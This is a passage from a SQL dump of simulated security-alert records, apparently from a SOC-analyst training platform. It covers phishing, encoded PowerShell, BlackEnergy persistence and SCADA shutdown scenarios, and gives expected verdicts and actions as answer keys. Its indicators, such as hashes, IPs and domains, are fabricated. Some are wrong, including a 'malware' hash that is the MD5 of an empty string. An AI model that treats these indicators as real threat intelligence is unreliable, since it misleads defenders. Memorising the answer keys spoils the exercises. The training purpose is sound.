time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.851Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-13T02:17:36Z\\\",\\\"event_type\\\":\\\"DB_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"access_time\\\":\\\"2023-10-13T02:16:45Z\\\",\\\"database\\\":\\\"CustomerData\\\",\\\"action\\\":\\\"SELECT\\\",\\\"affected_tables\\\":[\\\"customers\\\",\\\"orders\\\"],\\\"source_ip\\\":\\\"192.168.32.201\\\",\\\"dest_ip\\\":\\\"10.0.0.15\\\",\\\"login_status\\\":\\\"success\\\",\\\"access_method\\\":\\\"remote\\\",\\\"anomalous_activity\\\":true,\\\"notes\\\":\\\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(256, 'Suspicious Email Link Detected', 'medium', 'Email Gateway', 'An email containing a potentially harmful link was detected. The link is known to redirect users to phishing sites previously associated with credential harvesting campaigns.', 'Phishing Attempt', 'T1566.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-15T08:54:23Z\",\"email_id\":\"ae56d7f3-8496-439b-9077-41795bdee04b\",\"source_email\":\"alerts@banking-security.com\",\"destination_email\":\"johndoe@example.com\",\"subject\":\"Important: Account Verification Needed\",\"link\":\"http://secure-account-login.com/verify\",\"link_status\":\"Blacklisted\",\"detection_method\":\"URL Reputation Check\",\"actions_taken\":\"Email Quarantine\",\"headers\":{\"Received\":\"by mailserver.example.com with SMTP id abc123456 for johndoe@example.com\",\"From\":\"<alerts@banking-security.com>\",\"To\":\"<johndoe@example.com>\",\"Subject\":\"Important: Account Verification Needed\",\"Date\":\"15 Oct 2023 08:54:21 +0000\"},\"body\":\"Dear customer, your account requires verification. 
Click the link to secure your account: http://secure-account-login.com/verify\"}', '2025-12-29 05:31:26', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"security@secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"53/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\"}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Link Detected\",\"date\":\"2026-02-01T20:32:18.853Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(257, 'Suspicious PowerShell Script Execution Detected', 'medium', 'process', 'A PowerShell script was executed which is commonly used in fileless malware attacks. The script attempted network communication with a known malicious IP.', 'Malicious Script Execution', 'T1059.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-24T15:45:32Z\",\"event_id\":\"4674\",\"hostname\":\"DESKTOP-WX321\",\"username\":\"JohnDoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"cmdline\":\"powershell -NoProfile -ExecutionPolicy Bypass -File \\\"C:\\\\Users\\\\JohnDoe\\\\AppData\\\\Local\\\\Temp\\\\script.ps1\\\"\",\"file_hash\":\"3efd49ddfee84548bede1e13c4433b29f1db3f1d9b7f95c42e0b5cda1844afb0\",\"network_communication\":{\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.45\",\"dest_port\":443,\"protocol\":\"HTTPS\"},\"detection_engine\":\"Signature-based\",\"signature_id\":\"POWERSHELL-0012\",\"additional_info\":\"The destination IP is associated with known C2 servers.\"}', '2025-12-29 05:44:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"56.201.107.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 56.201.107.90 reported 310 times for malicious activity. 
Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(259, 'Suspicious PowerShell Execution Detected on Internal Host', 'high', 'CrowdStrike', 'A PowerShell script with obfuscated content was executed on an internal host. The script was used to download and execute a known malicious payload.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKS-0123\",\"file_hash\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"domain\":\"malicious-example.com\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -EncodedCommand YABhAHMAaAAgAC0AZQAgACcAMwBiADEAZgAyAGUAMQBhADIAZgA4AGIAOQBmADcAYwA2AGQANABlADUAYgAzAGEAMgBjADUAZABlADcAZgAnAA==\"}', '2025-12-30 01:27:50', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address associated with host CORP-WKS-0123.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in distributing malware.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of 
obfuscated PowerShell commands, a malicious file hash, and connections to a known malicious IP and domain confirm this as a malware attack.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(268, 'Phishing Email Detected', 'medium', 'Email Gateway', 'Employees report suspicious emails that appear to be from a trusted partner. Analysis of the email gateway logs reveals a phishing attempt with malicious attachments disguised as urgent documents.', 'Phishing', 'T1566.001', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-08T14:23:45Z\",\"email_id\":\"abc123@example.com\",\"from\":\"partner.support@trustedpartner.com\",\"to\":\"employee@corporate.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"urgent_document.pdf\",\"attachment_hash\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.45\"}', '2025-12-31 13:10:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"abc123@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Gateway Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual email activity detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware detected in attachment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email 
Detected\",\"date\":\"2026-02-01T20:32:18.857Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(269, 'BlackEnergy Malware Execution', 'high', 'EDR', 'After a user opens the malicious attachment, BlackEnergy malware is executed, providing the attackers with a foothold in the network. Endpoint Detection and Response (EDR) alerts on suspicious process activity linked to known malware signatures.', 'Malware', 'T1203: Exploitation for Client Execution', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"987654321\",\"hostname\":\"CORP-ENDPOINT-23\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"malware_name\":\"BlackEnergy\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice.doc\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"word.exe\",\"process_id\":4321,\"alert_signature\":\"BlackEnergy Malware Execution\"}', '2025-12-31 13:10:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with BlackEnergy campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known BlackEnergy malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(270, 'Persistence Mechanism Established', 'high', 'EDR', 'The attackers have used BlackEnergy malware to establish persistence on the target system. This was achieved through registry modifications and the creation of scheduled tasks, which were detected as anomalies in system configurations by the EDR.', 'Persistence', 'T1053: Scheduled Task/Job, T1112: Modify Registry', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"persistence\",\"host_ip\":\"10.0.1.15\",\"external_ip\":\"203.0.113.45\",\"process_name\":\"schtasks.exe\",\"user\":\"compromised_user\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\BlackEnergy\",\"scheduled_task\":\"BlackEnergy Task\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\"}', '2025-12-31 13:10:04', '2026-02-18 07:24:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BlackEnergy variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"File associated with unauthorized persistence 
mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_audit\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized actions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(271, 'Lateral Movement to OT Network', 'high', 'Network Monitoring Solution', 'Network monitoring solutions detect unusual lateral movement between the IT and OT networks, indicating the attackers are attempting to access the SCADA systems controlling the power grid. A suspicious connection attempt from an internal IT network to the OT network was observed using a compromised user account.', 'Lateral Movement', 'T1071.001', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"event_type\":\"connection_attempt\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\OT-SERVER\\\\SCADA\\\\config.dat\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"external_attacker_ip\":\"203.0.113.55\",\"connection_status\":\"failed\",\"reason\":\"Unauthorized access attempt detected\"}', '2025-12-31 13:10:04', '2026-02-18 07:26:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from IT network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from OT network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account attempting lateral movement\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with credential dumping tool\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence 
Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous cyber attacks targeting critical infrastructure\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(272, 'SCADA System Compromise', 'critical', 'SCADA Logs', 'Unauthorized command executions detected on SCADA systems, coinciding with a power outage. The attackers issued commands to disrupt power distribution, leading to a blackout.', 'Execution', 'T0811', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T02:45:12Z\",\"system_id\":\"SCADA-CTRL-01\",\"event_type\":\"command_execution\",\"user\":\"unauthorized_user\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.20\",\"command_executed\":\"shutdown -h now\",\"external_attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_script.sh\"}', '2025-12-31 13:10:04', '2026-02-18 07:27:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in previous SCADA attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious script used in SCADA disruptions\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Script designed to disrupt power distribution systems\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user audit logs\",\"verdict\":\"suspicious\",\"details\":\"User account used without 
authorization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:12Z\\\",\\\"system_id\\\":\\\"SCADA-CTRL-01\\\",\\\"event_type\\\":\\\"command_execution\\\",\\\"user\\\":\\\"unauthorized_user\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.20\\\",\\\"command_executed\\\":\\\"shutdown -h now\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.875Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
